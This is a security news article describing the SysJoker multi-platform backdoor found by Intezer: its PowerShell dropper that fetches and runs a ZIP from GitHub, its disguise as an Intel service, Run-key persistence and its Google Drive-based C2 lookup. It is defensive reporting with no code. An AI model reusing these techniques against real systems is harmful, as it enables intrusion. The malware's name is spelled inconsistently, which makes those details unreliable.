SysJocker, a new multi-platform backdoor virus that targets Windows, Linux, and macOS and can elude detection on all three operating systems, has been discovered in the wild. The new malware was first noticed by Intezer researchers, who first saw evidence of its activity in December 2021 while researching an attack on a Linux-based web server.
This malware’s sample was initially uploaded to VirusTotal in H2 2021, which corresponds to the C2 domain registration times. The security researchers had produced a thorough technical study on SysLocker, which they shared before it was published.
The malware is written in C++, and while each variation is customized to the target operating system, VirusTotal can’t detect them. This online malware scanning site employs 57 different antivirus detection engines. SysJocker employs a DLL as a first-stage dropper on Windows, which uses PowerShell instructions to perform the following:
- fetch the SysJocker ZIP from a GitHub repository,
- unzip it on “C:\ProgramData\RecoverySystem\”,
- execute the payload.
The malware then waits for up to two minutes before copying itself as an Intel Graphics Common User Interface Service (“igfxCUIService.exe”). “Next, SysJoker will gather information about the machine using Living off the Land (LOtL) commands. SysJoker uses different temporary text files to log the results of the commands,” clarifies Intezer’s report.
These text files are instantly destroyed, then placed in a JSON object, which is subsequently encoded and written to the “microsoft_Windows.dll” file. After collecting system and network data, the malware will develop persistence by inserting a new registry entry (HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run). All functions leading up to this point are interspersed with random sleep times.
The malware’s next step is to connect to the actor-controlled C2 server, which it does through a hardcoded Google Drive URL. The URL points to a “domain.txt” file that the actors change regularly to keep active beacons connected to accessible servers. To avoid detection and blockage, this list is updated periodically. As the initial handshake, the system information gathered in the early phases of the infection is conveyed to the C2. The C2 responds with a one-of-a-kind token that acts as the identifier of the infected endpoint.
The C2 may then direct the backdoor to install further malware, conduct instructions on the infected device, or delete the backdoor from the device. Those last two directives, however, have yet to be implemented. Despite the lack of a first-stage dropper in the form of a DLL in the Linux and macOS variants, they ultimately conduct the same harmful activity on the infected device.